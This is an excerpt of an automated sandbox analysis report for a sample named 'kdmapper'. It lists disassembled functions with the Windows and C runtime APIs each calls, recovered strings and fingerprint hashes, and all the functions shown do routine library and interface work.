Instruction ID: 0f9fea9051d4903e27b73e0bea710acfb31a979a5e6d1c32e2eb8a1c8434f2eb
Opcode Fuzzy Hash: 0f65ad5fa1ef8cdf13642a60f1087ff7abf5262ccb2baad988bb940a2dd2c364
Instruction Fuzzy Hash: 9741A231004220BFCB219FA4DC8CBAB7BAAFF48B05F00465DF98999256DB74D905CFA5

Function 00631218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0063122E

Part of subcall function 0062B146: GetVersionExW.KERNEL32(?), ref: 0062B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00631251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00631263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00631274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00631284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00631294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 006312CF
__aullrem.LIBCMT ref: 00631379

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: f263d1df44a856e60bd97950ec494cf76b6058f27b2feda5877677b032ef882f
Instruction ID: 63661b8a7ce8af076b751d312522b45bd4b9e8eb2b00aa71cab90b655f279901
Opcode Fuzzy Hash: f263d1df44a856e60bd97950ec494cf76b6058f27b2feda5877677b032ef882f
Instruction Fuzzy Hash: 844126B1508305AFD710DF65C88496BBBFAFF88715F00892EF596C6210E734E659CB92

Function 00622210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00622536

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0

Strings

xc%u, xrefs: 0062275A
;%u, xrefs: 00622523
x%u, xrefs: 006226FD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 6a9936d9b121d6a6dd33d83a33b890000ca722f08c8cb09aceb1313d8998c9a5
Instruction ID: 72167cdb4e6ef471a70f38bad89f230912a02c3b7ef194690650d43f0a92bbb6
Opcode Fuzzy Hash: 6a9936d9b121d6a6dd33d83a33b890000ca722f08c8cb09aceb1313d8998c9a5
Instruction Fuzzy Hash: DDF13B71604B61ABCB24DB24A4A57FE779B6F90300F08456DFC869B343CB648949CF66

Function 00639CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00639D0A

Strings

</style>, xrefs: 00639E52
<br>, xrefs: 00639DFE
</p>, xrefs: 00639DE8
>, xrefs: 00639D4B
<style>, xrefs: 00639E30

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 43bf4583747f8ac6ed1a122f06069483d2111de8fc67b89093d3404368b8764f
Instruction ID: 8bb32e3d4002b168daf943dfa37660965b140a16d1b19b3f49d24cc5f76f4428
Opcode Fuzzy Hash: 43bf4583747f8ac6ed1a122f06069483d2111de8fc67b89093d3404368b8764f
Instruction Fuzzy Hash: 2351F56664472395DB30AA2598127F673E3DFA1750F69041AE9C18B3C0FBE58C818AF5

Function 0064F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0064FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0064F6CF
__fassign.LIBCMT ref: 0064F74A
__fassign.LIBCMT ref: 0064F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0064F78B
WriteFile.KERNEL32(?,00000000,00000000,0064FE02,00000000,?,?,?,?,?,?,?,?,?,0064FE02,00000000), ref: 0064F7AA
WriteFile.KERNEL32(?,00000000,00000001,0064FE02,00000000,?,?,?,?,?,?,?,?,?,0064FE02,00000000), ref: 0064F7E3

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d918e1ae5642c8a8734f284fd06d3c5d0e468165dbdd332c290f046c76e5ec7e
Instruction ID: cfd3d451581b6b6ac052c6a7d2d988c58d1a4ade0da5f663da14866b41b7feb6
Opcode Fuzzy Hash: d918e1ae5642c8a8734f284fd06d3c5d0e468165dbdd332c290f046c76e5ec7e
Instruction Fuzzy Hash: B651B4B1D00209AFCB10CFA8DC85AEEBBF6EF09310F15416AE555E7391D731AA41CBA0

Function 0063CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0063CE9D

Part of subcall function 0062B690: _wcslen.LIBCMT ref: 0062B696

_swprintf.LIBCMT ref: 0063CED1

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

SetDlgItemTextW.USER32(?,00000066,0066946A), ref: 0063CEF1
_wcschr.LIBVCRUNTIME ref: 0063CF22
EndDialog.USER32(?,00000001), ref: 0063CFFE

Strings

%s%s%u, xrefs: 0063CEC6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: bcfba4385525bccc45a56dae57e4d57c3147dc3d0a5654532300c92f5814f4d3
Instruction ID: dc6b84c2422ca1c9a8c260f7de1df8e56d9b661fd4756387d2eebc6140919e84
Opcode Fuzzy Hash: bcfba4385525bccc45a56dae57e4d57c3147dc3d0a5654532300c92f5814f4d3
Instruction Fuzzy Hash: 224191B1800618AADF25DBA0DC45EEA77FEEF05750F4080AAF909E7141EF709A44CFA5

Function 00642900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00642937
___except_validate_context_record.LIBVCRUNTIME ref: 0064293F
_ValidateLocalCookies.LIBCMT ref: 006429C8
__IsNonwritableInCurrentImage.LIBCMT ref: 006429F3
_ValidateLocalCookies.LIBCMT ref: 00642A48

Strings

csm, xrefs: 006429DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 05513d6d7b7a8fda6fe8fc5b8caae5f7e795d2bd282fffca0362cd53437747d8
Instruction ID: f08da07ad860b2bf79ead5ddae2b8ea357b7fadfa890c5bbedc72617cc899085
Opcode Fuzzy Hash: 05513d6d7b7a8fda6fe8fc5b8caae5f7e795d2bd282fffca0362cd53437747d8
Instruction Fuzzy Hash: D141C530A0021AAFCF10DF69C895ADE7BB7AF44324F648159FC15AB392D731DA55CB90

Function 00639955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0063995E
_wcslen.LIBCMT ref: 00639993

Strings

<br>, xrefs: 006399DF
, xrefs: 006399B0
 , xrefs: 00639A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00639987

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 0bd1930e04fd68adf894e96e2b399dd4d83a85fde6538d99cadb3ade91ad2e4e
Instruction ID: b758be6a59f7cf5bdfe4746a51da8793e50995b30fc41dc4d5115f4f8ae1ab41
Opcode Fuzzy Hash: 0bd1930e04fd68adf894e96e2b399dd4d83a85fde6538d99cadb3ade91ad2e4e
Instruction Fuzzy Hash: F7315B3264434656DB30AB549C42BBA73E6EB90720F50451FF882473C0FBE0AD8587F5

Function 0064C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0064C868: _free.LIBCMT ref: 0064C891

_free.LIBCMT ref: 0064C8F2

Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4

_free.LIBCMT ref: 0064C8FD
_free.LIBCMT ref: 0064C908
_free.LIBCMT ref: 0064C95C
_free.LIBCMT ref: 0064C967
_free.LIBCMT ref: 0064C972
_free.LIBCMT ref: 0064C97D

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: edd4d095af8a5b7c8e499acd1dd0d0f7b6ee95aa078947361dc955b958ef084d
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 4C113D71A92B08AEE7A0B7B1CC07FCB7BAE9F00B10F400C1DB29D67293DA65A5058754

Function 0063E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0063E669,0063E5CC,0063E86D), ref: 0063E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0063E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0063E630

Strings

KERNEL32.DLL, xrefs: 0063E600
ReleaseSRWLockExclusive, xrefs: 0063E625
AcquireSRWLockExclusive, xrefs: 0063E615

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 1bdc3ee7948a551f53125315ab014c3b7195f26c0f507400c4253351ea295f16
Instruction ID: 2e2aef5e0472d99b204df1daf4fd0f37709ee0ccc7eb86514092f3b1e0730626
Opcode Fuzzy Hash: 1bdc3ee7948a551f53125315ab014c3b7195f26c0f507400c4253351ea295f16
Instruction Fuzzy Hash: 6EF0C2317803225B0F218EA55C9A5A662CF6A27792F011539E902D73D0EB16CD565BF0

Function 00648900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0064891E

Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4

_free.LIBCMT ref: 00648930
_free.LIBCMT ref: 00648943
_free.LIBCMT ref: 00648954
_free.LIBCMT ref: 00648965

Strings

pe, xrefs: 00648914

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: pe
API String ID: 776569668-324909747
Opcode ID: 800eea9d03a9f402c21193e61212c803aea8ccebddd17efe16ca5c1ddedbcaa4
Instruction ID: 3ec288e30488ec9fd377ceb0da3237d66ca7d49fa670fd30d9df22ab0779e9c7
Opcode Fuzzy Hash: 800eea9d03a9f402c21193e61212c803aea8ccebddd17efe16ca5c1ddedbcaa4
Instruction Fuzzy Hash: 37F0DA71811623AF8B8AAF18FC2245D3FA3FB24725711270AF514973B2DB364A819B85

Function 0063146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 006314C2

Part of subcall function 0062B146: GetVersionExW.KERNEL32(?), ref: 0062B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006314E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00631500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00631513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00631523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00631533

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 42e0162fa746823e6cee318133d7bb0d11cc7ef16ab681f5d299a8a86312047e
Instruction ID: 58379a11010d772a94b631d0c97ec0098dd4ddab60b2bc374d0b294c351753db
Opcode Fuzzy Hash: 42e0162fa746823e6cee318133d7bb0d11cc7ef16ab681f5d299a8a86312047e
Instruction Fuzzy Hash: F231F675108316ABC700DFA8C88499BBBF9BF98754F005A1EF999C3210E730D619CBA6

Function 00642AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00642AF1,006402FC,0063FA34), ref: 00642B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00642B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00642B2F
SetLastError.KERNEL32(00000000,00642AF1,006402FC,0063FA34), ref: 00642B81

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 194949cc0bb3042157563dfa6dac82bb0895f131ee354d761e4a1244a27fd35e
Instruction ID: b9c7179f814ef812f341b5e618d6c35c26d8f75d0c095d9be40e5f8a1b26c28b
Opcode Fuzzy Hash: 194949cc0bb3042157563dfa6dac82bb0895f131ee354d761e4a1244a27fd35e
Instruction Fuzzy Hash: 7201D4365097236EAB582E747C959AA2F5BEF46BBABF0173EF110552E0EF124D009148

Function 006497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
_free.LIBCMT ref: 0064981C
_free.LIBCMT ref: 00649844
SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 00649851
SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
_abort.LIBCMT ref: 00649863

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 65b16ac38b7109bc04364212d37dd7982d4cb214f31f29d9de8c7fd1cfcdaa38
Instruction ID: 36722333a7a4fda6d44ebc30a089d4c06646d8728d6c2cdbd226463c6d3350b5
Opcode Fuzzy Hash: 65b16ac38b7109bc04364212d37dd7982d4cb214f31f29d9de8c7fd1cfcdaa38
Instruction Fuzzy Hash: 93F028351C07116EC7927778BC0AA9F2A678FE2B72F21052CF525933D2FE21C9028539

Function 0063DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0063DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063DC72
TranslateMessage.USER32(?), ref: 0063DC7C
DispatchMessageW.USER32(?), ref: 0063DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0063DC91

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: ad5d32fdd15bd65b2d5c12c95e1632ce7ad912a976423bba2498d24bc07f6b9f
Instruction ID: b564a0979c1342b2f2535e9782010dbdc3fe50a2e77a2c08db2d034b0456a405
Opcode Fuzzy Hash: ad5d32fdd15bd65b2d5c12c95e1632ce7ad912a976423bba2498d24bc07f6b9f
Instruction Fuzzy Hash: 7CF03C72A01229BBCB20ABA5EC4CDCB7F6EEF42B91F005111B50AD2250D6748646C7A0

Function 0063A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0063A699: GetDC.USER32(00000000), ref: 0063A69D
Part of subcall function 0063A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0063A6A8
Part of subcall function 0063A699: ReleaseDC.USER32(00000000,00000000), ref: 0063A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0063A83C

Part of subcall function 0063AAC9: GetDC.USER32(00000000), ref: 0063AAD2
Part of subcall function 0063AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0063AB01
Part of subcall function 0063AAC9: ReleaseDC.USER32(00000000,?), ref: 0063AB99

Strings

"c, xrefs: 0063A89D, 0063AAB9
(, xrefs: 0063A9AA
Ac, xrefs: 0063A9BA

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "c$($Ac
API String ID: 1061551593-2311861970
Opcode ID: 7aaf4b8d9169ac3bdbac96e77a71f6d1576b8b6692287758515cbaf607e2610e
Instruction ID: aa2060c2fd2d7d8057d18a028c74e6054d2f3ec146ab9e6d1733813e0e0d908e
Opcode Fuzzy Hash: 7aaf4b8d9169ac3bdbac96e77a71f6d1576b8b6692287758515cbaf607e2610e
Instruction Fuzzy Hash: BC910471604754AFD710DF65C844A2BBBEAFFC9B01F00491EF59AD3260DB30A905DBA2

